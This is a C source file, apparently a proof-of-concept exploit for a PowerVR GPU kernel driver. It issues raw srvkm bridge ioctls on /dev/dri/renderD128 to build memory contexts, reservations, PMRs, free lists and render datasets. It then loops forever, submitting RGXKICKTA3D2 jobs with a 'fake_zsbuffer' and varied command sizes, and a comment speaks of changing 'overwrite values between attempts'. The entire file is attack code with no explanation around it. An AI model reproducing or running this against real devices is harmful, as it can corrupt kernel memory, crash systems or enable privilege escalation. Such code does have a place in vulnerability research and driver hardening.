#include <poll.h>
#include <inttypes.h>
#include <err.h>
#include <assert.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <sys/ioctl.h>

#define __packed __attribute__((packed))

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})




/* =====================   BRIDGE   ===================== */
static int gpu_fd;

#define DRM_IOCTL_PVR_SRVKM_INIT 0x40046445
#define PVR_SRVKM_SERVICES_INIT  1
#define PVR_SRVKM_SYNC_INIT 2
struct drm_pvr_srvkm_init_data {
  uint32_t init_module;
};
static void srvkm_init(int fd, int mode) {
  struct drm_pvr_srvkm_init_data data = { .init_module = mode };
  SYSCHK(ioctl(fd, DRM_IOCTL_PVR_SRVKM_INIT, &data));
}

struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
#define DRM_IOCTL_PVR_SRVKM_CMD 0xc0206440

static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_CMD, &cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})

typedef void *IMG_HANDLE;
typedef int PVRSRV_ERROR;
typedef uint64_t IMG_DEV_VIRTADDR;
typedef uint64_t IMG_DEVMEM_SIZE_T;
typedef uint64_t IMG_DEVMEM_ALIGN_T;
typedef uint64_t IMG_DEVMEM_OFFSET_T;
typedef uint32_t IMG_DEVMEM_LOG2ALIGN_T;
typedef unsigned int  IMG_UINT;
typedef int       IMG_INT;
typedef uint8_t     IMG_UINT8,  *IMG_PUINT8;
typedef uint8_t     IMG_BYTE, *IMG_PBYTE;
typedef int8_t      IMG_INT8;
typedef char      IMG_CHAR, *IMG_PCHAR;
typedef uint16_t    IMG_UINT16, *IMG_PUINT16;
typedef int16_t     IMG_INT16;
typedef uint32_t    IMG_UINT32, *IMG_PUINT32;
typedef int32_t     IMG_INT32,  *IMG_PINT32;
typedef uint64_t    IMG_UINT64, *IMG_PUINT64;
typedef int64_t     IMG_INT64;
typedef IMG_UINT64 PVRSRV_MEMALLOCFLAGS_T;
typedef int32_t PVRSRV_FENCE;
typedef int32_t PVRSRV_TIMELINE;
typedef IMG_UINT32      IMG_PID;
typedef enum tag_img_bool
{
  IMG_FALSE   = 0,
  IMG_TRUE    = 1,
  IMG_FORCE_ALIGN = 0x7FFFFFFF
} IMG_BOOL, *IMG_PBOOL;

#define PVRSRV_BRIDGE_MM 6UL
#define PVRSRV_BRIDGE_RGXCMP 129UL

#define PVRSRV_MEMALLOCFLAG_GPU_UNCACHED_WC      (0ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_UNCACHED         (1ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_CACHE_COHERENT   (2ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_CACHE_INCOHERENT (3ULL<<8)

#define PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC      (0ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_UNCACHED         (1ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_COHERENT   (2ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_INCOHERENT (3ULL<<11)

#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN       (1ULL<<19)

#define PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2 47
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2_TAG
{
  IMG_DEV_VIRTADDR sAddress;
  IMG_DEVMEM_SIZE_T uiLength;
  IMG_HANDLE hDevmemServerHeap;
  PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2_TAG
{
  IMG_HANDLE hReservation;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2;
static IMG_HANDLE create_reservation(IMG_HANDLE heap, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2 in = {
    .sAddress = base,
    .uiLength = len,
    .hDevmemServerHeap = heap,
    .uiFlags = 0xff/*CPU+GPU R+W*/ | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2 out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2);
  return out.hReservation;
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE 15
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE_TAG
{
        int bbKernelMemoryCtx;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE_TAG
{
        IMG_HANDLE hDevMemServerContext;
        IMG_HANDLE hPrivData;
        int eError;
        unsigned int ui32CPUCacheLineSize;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE;
static IMG_HANDLE create_device_memory_context(IMG_HANDLE *priv_data_out) {
  PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE in = { .bbKernelMemoryCtx = false };
  PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE);
  *priv_data_out = out.hPrivData;
  return out.hDevMemServerContext;
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE 17
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE_TAG
{
  IMG_DEV_VIRTADDR sHeapBaseAddr;
  IMG_DEVMEM_SIZE_T uiHeapLength;
  IMG_HANDLE hDevmemCtx;
  IMG_UINT32 ui32Log2DataPageSize;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE_TAG
{
  IMG_HANDLE hDevmemHeapPtr;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE;
static IMG_HANDLE create_heap(IMG_HANDLE mem_ctx, uint64_t base_addr, uint64_t length, unsigned int page_size_log2) {
  PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE in = {
    .sHeapBaseAddr = base_addr,
    .uiHeapLength = length,
    .hDevmemCtx = mem_ctx,
    .ui32Log2DataPageSize = page_size_log2
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE);
  return out.hDevmemHeapPtr;
}

#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR     10
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
  IMG_DEVMEM_SIZE_T uiChunkSize;
  IMG_DEVMEM_SIZE_T uiSize;
  IMG_UINT32 *pui32MappingTable;
  const IMG_CHAR *puiAnnotation;
  IMG_UINT32 ui32AnnotationLength;
  IMG_UINT32 ui32Log2PageSize;
  IMG_UINT32 ui32NumPhysChunks;
  IMG_UINT32 ui32NumVirtChunks;
  IMG_UINT32 ui32PDumpFlags;
  IMG_PID ui32PID;
  PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
  IMG_HANDLE hPMRPtr;
  PVRSRV_ERROR eError;
  PVRSRV_MEMALLOCFLAGS_T uiOutFlags;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
// non-sparse, locked
static IMG_HANDLE alloc_pmr_sparse() {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  uint64_t cache_flags = PVRSRV_MEMALLOCFLAG_CPU_CACHE_INCOHERENT | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN;
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = 0x1000,
    .uiSize = 0x2000,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = 12,
    .ui32NumPhysChunks = 1, // ?
    .ui32NumVirtChunks = 2,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | cache_flags |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) |
               (/*zero backing*/0<<20) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR);
  return out.hPMRPtr;
}
static IMG_HANDLE alloc_pmr(uint64_t alloc_size, uint64_t extra_flags) {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  uint64_t cpu_cache_mode = 0;
  uint64_t gpu_cache_mode = 1;
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = alloc_size,
    .uiSize = alloc_size,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = 12,
    .ui32NumPhysChunks = 1, // ?
    .ui32NumVirtChunks = 1,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | extra_flags |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) |
               (/*zero backing*/0<<20) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR);
  return out.hPMRPtr;
}
static IMG_HANDLE alloc_pmr_uncached(uint64_t alloc_size) {
  return alloc_pmr(alloc_size, PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN | 0xf0/*CPU RW, remap ok*/);
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR2     49
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2_TAG
{
  IMG_HANDLE hDevmemServerHeap;
  IMG_HANDLE hPMR;
  IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2;
static void map_pmr(IMG_HANDLE heap, IMG_HANDLE pmr, IMG_HANDLE resv) {
  PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2 in = { .hDevmemServerHeap = heap, .hPMR = pmr, .hReservation = resv };
  PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR2);
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPMR2     50
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2_TAG
{
  IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2;
static void unmap_pmr(IMG_HANDLE res) {
  PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2 in = { .hReservation = res };
  PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPMR2);
}


#define PVRSRV_BRIDGE_RGXTA3D                    130UL

#define PVRSRV_BRIDGE_RGXTA3D_RGXCREATERENDERCONTEXT      8
typedef struct PVRSRV_BRIDGE_IN_RGXCREATERENDERCONTEXT_TAG
{
  IMG_DEV_VIRTADDR sVDMCallStackAddr;
  IMG_UINT64 ui64RobustnessAddress;
  IMG_HANDLE hPrivData;
  IMG_BYTE *pui8FrameworkCmd;
  IMG_BYTE *pui8StaticRenderContextState;
  IMG_UINT32 ui32ContextFlags;
  IMG_UINT32 ui32FrameworkCmdSize;
  IMG_UINT32 ui32Max3DDeadlineMS;
  IMG_UINT32 ui32MaxTADeadlineMS;
  IMG_UINT32 ui32PackedCCBSizeU8888;
  IMG_UINT32 ui32Priority;
  IMG_UINT32 ui32StaticRenderContextStateSize;
  IMG_UINT32 ui32ui32CallStackDepth;
} __packed PVRSRV_BRIDGE_IN_RGXCREATERENDERCONTEXT;
typedef struct PVRSRV_BRIDGE_OUT_RGXCREATERENDERCONTEXT_TAG
{
  IMG_HANDLE hRenderContext;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_RGXCREATERENDERCONTEXT;

#define PVRSRV_BRIDGE_RGXTA3D_RGXKICKTA3D2      12
typedef struct PVRSRV_BRIDGE_IN_RGXKICKTA3D2_TAG
{
  IMG_UINT64 ui64Deadline;
  IMG_HANDLE hKMHWRTDataSet;
  IMG_HANDLE hMSAAScratchBuffer;
  IMG_HANDLE hPRFenceUFOSyncPrimBlock;
  IMG_HANDLE hRenderContext;
  IMG_HANDLE hZSBuffer;
  IMG_UINT32 *pui32Client3DUpdateSyncOffset;
  IMG_UINT32 *pui32Client3DUpdateValue;
  IMG_UINT32 *pui32ClientTAFenceSyncOffset;
  IMG_UINT32 *pui32ClientTAFenceValue;
  IMG_UINT32 *pui32ClientTAUpdateSyncOffset;
  IMG_UINT32 *pui32ClientTAUpdateValue;
  IMG_UINT32 *pui32SyncPMRFlags;
  IMG_BYTE *pui83DCmd;
  IMG_BYTE *pui83DPRCmd;
  IMG_BYTE *pui8TACmd;
  IMG_CHAR *puiUpdateFenceName;
  IMG_CHAR *puiUpdateFenceName3D;
  IMG_HANDLE *phClient3DUpdateSyncPrimBlock;
  IMG_HANDLE *phClientTAFenceSyncPrimBlock;
  IMG_HANDLE *phClientTAUpdateSyncPrimBlock;
  IMG_HANDLE *phSyncPMRs;
  IMG_BOOL bbAbort;
  IMG_BOOL bbKick3D;
  IMG_BOOL bbKickPR;
  IMG_BOOL bbKickTA;
  PVRSRV_FENCE hCheckFence;
  PVRSRV_FENCE hCheckFence3D;
  PVRSRV_TIMELINE hUpdateTimeline;
  PVRSRV_TIMELINE hUpdateTimeline3D;
  IMG_UINT32 ui323DCmdSize;
  IMG_UINT32 ui323DPRCmdSize;
  IMG_UINT32 ui32Client3DUpdateCount;
  IMG_UINT32 ui32ClientTAFenceCount;
  IMG_UINT32 ui32ClientTAUpdateCount;
  IMG_UINT32 ui32ExtJobRef;
  IMG_UINT32 ui32NumberOfDrawCalls;
  IMG_UINT32 ui32NumberOfIndices;
  IMG_UINT32 ui32NumberOfMRTs;
  IMG_UINT32 ui32PDumpFlags;
  IMG_UINT32 ui32PRFenceUFOSyncOffset;
  IMG_UINT32 ui32PRFenceValue;
  IMG_UINT32 ui32RenderTargetSize;
  IMG_UINT32 ui32SyncPMRCount;
  IMG_UINT32 ui32TACmdSize;
} __packed PVRSRV_BRIDGE_IN_RGXKICKTA3D2;
typedef struct PVRSRV_BRIDGE_OUT_RGXKICKTA3D2_TAG
{
  PVRSRV_ERROR eError;
  PVRSRV_FENCE hUpdateFence;
  PVRSRV_FENCE hUpdateFence3D;
} __packed PVRSRV_BRIDGE_OUT_RGXKICKTA3D2;

#define PVRSRV_BRIDGE_RGXTA3D_RGXCREATEZSBUFFER2      14
typedef struct PVRSRV_BRIDGE_IN_RGXCREATEZSBUFFER2_TAG
{
  IMG_HANDLE hPMR;
  IMG_HANDLE hReservation;
  PVRSRV_MEMALLOCFLAGS_T uiMapFlags;
} __packed PVRSRV_BRIDGE_IN_RGXCREATEZSBUFFER2;
typedef struct PVRSRV_BRIDGE_OUT_RGXCREATEZSBUFFER2_TAG
{
  IMG_HANDLE hsZSBufferKM;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_RGXCREATEZSBUFFER2;

#define PVRSRV_BRIDGE_RGXTA3D_RGXCREATEHWRTDATASET      0
typedef struct PVRSRV_BRIDGE_IN_RGXCREATEHWRTDATASET_TAG
{
  IMG_UINT64 ui64FlippedMultiSampleCtl;
  IMG_UINT64 ui64MultiSampleCtl;
  IMG_DEV_VIRTADDR *psMacrotileArrayDevVAddr;
  IMG_DEV_VIRTADDR *psPMMlistDevVAddr;
  IMG_DEV_VIRTADDR *psRTCDevVAddr;
  IMG_DEV_VIRTADDR *psRgnHeaderDevVAddr;
  IMG_DEV_VIRTADDR *psTailPtrsDevVAddr;
  IMG_DEV_VIRTADDR *psVHeapTableDevVAddr;
  IMG_HANDLE *phKmHwRTDataSet;
  IMG_HANDLE *phapsFreeLists;
  IMG_UINT32 ui32ISPMergeLowerX;
  IMG_UINT32 ui32ISPMergeLowerY;
  IMG_UINT32 ui32ISPMergeScaleX;
  IMG_UINT32 ui32ISPMergeScaleY;
  IMG_UINT32 ui32ISPMergeUpperX;
  IMG_UINT32 ui32ISPMergeUpperY;
  IMG_UINT32 ui32ISPMtileSize;
  IMG_UINT32 ui32MTileStride;
  IMG_UINT32 ui32PPPScreen;
  IMG_UINT32 ui32RgnHeaderSize;
  IMG_UINT32 ui32TEAA;
  IMG_UINT32 ui32TEMTILE1;
  IMG_UINT32 ui32TEMTILE2;
  IMG_UINT32 ui32TEScreen;
  IMG_UINT32 ui32TPCSize;
  IMG_UINT32 ui32TPCStride;
  IMG_UINT16 ui16MaxRTs;
} __packed PVRSRV_BRIDGE_IN_RGXCREATEHWRTDATASET;
typedef struct PVRSRV_BRIDGE_OUT_RGXCREATEHWRTDATASET_TAG
{
  IMG_HANDLE *phKmHwRTDataSet;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_RGXCREATEHWRTDATASET;

#define PVRSRV_BRIDGE_RGXTA3D_RGXCREATEFREELIST2      15
typedef struct PVRSRV_BRIDGE_IN_RGXCREATEFREELIST2_TAG
{
  IMG_HANDLE hFreeListReservation;
  IMG_HANDLE hMemCtxPrivData;
  IMG_HANDLE hsGlobalFreeList;
  IMG_BOOL bbFreeListCheck;
  IMG_UINT32 ui32GrowFLPages;
  IMG_UINT32 ui32GrowParamThreshold;
  IMG_UINT32 ui32InitFLPages;
  IMG_UINT32 ui32MaxFLPages;
} __packed PVRSRV_BRIDGE_IN_RGXCREATEFREELIST2;
typedef struct PVRSRV_BRIDGE_OUT_RGXCREATEFREELIST2_TAG
{
  IMG_HANDLE hCleanupCookie;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_RGXCREATEFREELIST2;


#define PVRSRV_BRIDGE_SYNC          2UL

#define PVRSRV_BRIDGE_SYNC_ALLOCSYNCPRIMITIVEBLOCK      0
typedef struct PVRSRV_BRIDGE_IN_ALLOCSYNCPRIMITIVEBLOCK_TAG
{
  /*IMG_UINT32 ui32EmptyStructPlaceholder;*/
} __packed PVRSRV_BRIDGE_IN_ALLOCSYNCPRIMITIVEBLOCK;
typedef struct PVRSRV_BRIDGE_OUT_ALLOCSYNCPRIMITIVEBLOCK_TAG
{
  IMG_HANDLE hSyncHandle;
  IMG_HANDLE hhSyncPMR;
  PVRSRV_ERROR eError;
  IMG_UINT32 ui32SyncPrimBlockSize;
  IMG_UINT32 ui32SyncPrimVAddr;
} __packed PVRSRV_BRIDGE_OUT_ALLOCSYNCPRIMITIVEBLOCK;



/* =====================   MAIN   ===================== */
int main(void) {
  setbuf(stdout, NULL);
  printf("PID=%d\n", getpid());
  gpu_fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
  srvkm_init(gpu_fd, PVR_SRVKM_SERVICES_INIT);
  IMG_HANDLE hPrivData;
  IMG_HANDLE ctx = create_device_memory_context(&hPrivData);

  IMG_HANDLE heap_general = create_heap(ctx, 0x8000000000, 0x2000000000, 12);
  IMG_HANDLE fake_zsbuffer_res = create_reservation(heap_general, 0x8100000000, 0x1000);
  IMG_HANDLE fake_zsbuffer_pmr = alloc_pmr_uncached(0x1000);

  IMG_HANDLE sync_handle;
  IMG_HANDLE sync_pmr;
  {
    PVRSRV_BRIDGE_IN_ALLOCSYNCPRIMITIVEBLOCK in = {};
    PVRSRV_BRIDGE_OUT_ALLOCSYNCPRIMITIVEBLOCK out;
    do_driver_cmd(PVRSRV_BRIDGE_SYNC, PVRSRV_BRIDGE_SYNC_ALLOCSYNCPRIMITIVEBLOCK);
    sync_handle = out.hSyncHandle;
    sync_pmr = out.hhSyncPMR;
  }

  IMG_HANDLE render_context;
  {
    PVRSRV_BRIDGE_IN_RGXCREATERENDERCONTEXT in = {
      .hPrivData = hPrivData
    };
    PVRSRV_BRIDGE_OUT_RGXCREATERENDERCONTEXT out;
    do_driver_cmd(PVRSRV_BRIDGE_RGXTA3D, PVRSRV_BRIDGE_RGXTA3D_RGXCREATERENDERCONTEXT);
    render_context = out.hRenderContext;
  }

  IMG_HANDLE freelist_res = create_reservation(heap_general, 0x8120000000, 0x10000);
  IMG_HANDLE freelist_pmr = alloc_pmr(0x10000, PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN | (1<<26));
  map_pmr(heap_general, freelist_pmr, freelist_res);
  IMG_HANDLE freelist;
  {
    PVRSRV_BRIDGE_IN_RGXCREATEFREELIST2 in = {
      .hFreeListReservation = freelist_res,
      .hMemCtxPrivData = hPrivData,
      .ui32GrowFLPages = 1,
      .ui32InitFLPages = 1,
      .ui32MaxFLPages = 4
    };
    PVRSRV_BRIDGE_OUT_RGXCREATEFREELIST2 out;
    do_driver_cmd(PVRSRV_BRIDGE_RGXTA3D, PVRSRV_BRIDGE_RGXTA3D_RGXCREATEFREELIST2);
    freelist = out.hCleanupCookie;
  }

  #define RGXMKIF_NUM_RTDATAS           2U
  #define RGXMKIF_NUM_GEOMDATAS         1U
  #define RGXMKIF_NUM_RTDATA_FREELISTS  2U  /* RGXMKIF_NUM_RTDATAS * RGXFW_MAX_FREELISTS */
  #define RGX_NUM_GEOM_CORES           (1U)
  IMG_HANDLE rtdatas_arr[RGXMKIF_NUM_RTDATAS] = {0};
  {
    IMG_DEV_VIRTADDR psVHeapTableDevVAddr[RGXMKIF_NUM_GEOMDATAS] = {0};
    IMG_DEV_VIRTADDR psPMMlistDevVAddr[RGXMKIF_NUM_RTDATAS] = {0};
    IMG_HANDLE phapsFreeLists[RGXMKIF_NUM_RTDATA_FREELISTS];
    for (int i=0; i<RGXMKIF_NUM_RTDATA_FREELISTS; i++)
      phapsFreeLists[i] = freelist;
    IMG_DEV_VIRTADDR psTailPtrsDevVAddr[RGXMKIF_NUM_GEOMDATAS] = {0};
    IMG_DEV_VIRTADDR psMacrotileArrayDevVAddr[RGXMKIF_NUM_RTDATAS] = {0};
    IMG_DEV_VIRTADDR psRgnHeaderDevVAddr[RGXMKIF_NUM_RTDATAS] = {0};
    IMG_DEV_VIRTADDR psRTCDevVAddr[RGXMKIF_NUM_GEOMDATAS] = {0};
    PVRSRV_BRIDGE_IN_RGXCREATEHWRTDATASET in = {
      .psVHeapTableDevVAddr = psVHeapTableDevVAddr,
      .psPMMlistDevVAddr = psPMMlistDevVAddr,
      .phapsFreeLists = phapsFreeLists,
      .psTailPtrsDevVAddr = psTailPtrsDevVAddr,
      .psMacrotileArrayDevVAddr = psMacrotileArrayDevVAddr,
      .psRgnHeaderDevVAddr = psRgnHeaderDevVAddr,
      .psRTCDevVAddr = psRTCDevVAddr,

      .phKmHwRTDataSet = rtdatas_arr
    };
    PVRSRV_BRIDGE_OUT_RGXCREATEHWRTDATASET out;
    do_driver_cmd(PVRSRV_BRIDGE_RGXTA3D, PVRSRV_BRIDGE_RGXTA3D_RGXCREATEHWRTDATASET);

  }

  IMG_HANDLE fake_zsbuffer;
  for (unsigned long loop = 0; true; loop++) {
    if ((loop&7) == 0) {
      // change some of the overwrite values between attempts
      {
        PVRSRV_BRIDGE_IN_RGXCREATEZSBUFFER2 in = { .hPMR = fake_zsbuffer_pmr, .hReservation = fake_zsbuffer_res };
        PVRSRV_BRIDGE_OUT_RGXCREATEZSBUFFER2 out;
        do_driver_cmd(PVRSRV_BRIDGE_RGXTA3D, PVRSRV_BRIDGE_RGXTA3D_RGXCREATEZSBUFFER2);
        fake_zsbuffer = out.hsZSBufferKM;
      }
    }
    {
      uint32_t pui32SyncPMRFlags[] = { 0 };
      char update_fence_name[32] = "\0";
      PVRSRV_BRIDGE_IN_RGXKICKTA3D2 in = {
        .hRenderContext = render_context,
        .hPRFenceUFOSyncPrimBlock = sync_handle,
        .puiUpdateFenceName = update_fence_name,
        .puiUpdateFenceName3D = update_fence_name,

        .hKMHWRTDataSet = rtdatas_arr[0],

        .hZSBuffer = fake_zsbuffer,
        .hMSAAScratchBuffer = fake_zsbuffer,

        .pui83DCmd = "AAAAAAAA",
        .ui323DCmdSize = (loop&7),

        .ui32SyncPMRCount = 1,
        .pui32SyncPMRFlags = pui32SyncPMRFlags,
        .phSyncPMRs = &fake_zsbuffer_pmr,
      };
      PVRSRV_BRIDGE_OUT_RGXKICKTA3D2 out;
      do_driver_cmd_noerror(PVRSRV_BRIDGE_RGXTA3D, PVRSRV_BRIDGE_RGXTA3D_RGXKICKTA3D2);
    }
  }
}
